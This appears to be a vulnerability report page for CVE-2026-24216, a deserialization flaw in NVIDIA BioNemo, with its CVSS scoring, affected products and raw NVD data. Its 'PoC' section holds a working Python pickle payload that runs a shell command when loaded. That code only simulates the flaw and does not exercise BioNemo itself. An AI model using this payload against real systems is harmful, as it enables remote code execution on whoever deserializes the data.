Security Vulnerability Report
中文
CVE-2026-24216 CVSS 7.8 HIGH

CVE-2026-24216

Published: 2026-05-20 20:16:36
Last Modified: 2026-05-21 20:08:33

Description

NVIDIA BioNemo for Linux contains a vulnerability where a user could cause a deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:bionemo_framework:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
NVIDIA BioNemo for Linux (具体受影响版本请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import pickle import os # Simulating a malicious payload for deserialization class ExploitPayload: def __reduce__(self): # Execute a command when the object is deserialized # In a real attack, this could be a reverse shell return (os.system, ('whoami',)) # Create the malicious serialized data malicious_data = pickle.dumps(ExploitPayload()) # Simulate the vulnerable component in NVIDIA BioNemo def vulnerable_function(user_input): print("[+] Processing user input...") try: # The vulnerability occurs here: deserializing untrusted data pickle.loads(user_input) except Exception as e: print(f"[-] Error during processing: {e}") # Trigger the vulnerability print("[*] Generating Proof of Concept for CVE-2026-24216...") vulnerable_function(malicious_data) print("[*] Exploit finished.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24216", "sourceIdentifier": "[email protected]", "published": "2026-05-20T20:16:36.350", "lastModified": "2026-05-21T20:08:32.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA BioNemo for Linux contains a vulnerability where a user could cause a deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:bionemo_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-04-03", "matchCriteriaId": "F88658A3-88E0-4972-931D-333FB874CD4F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24216", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5831", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24216", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}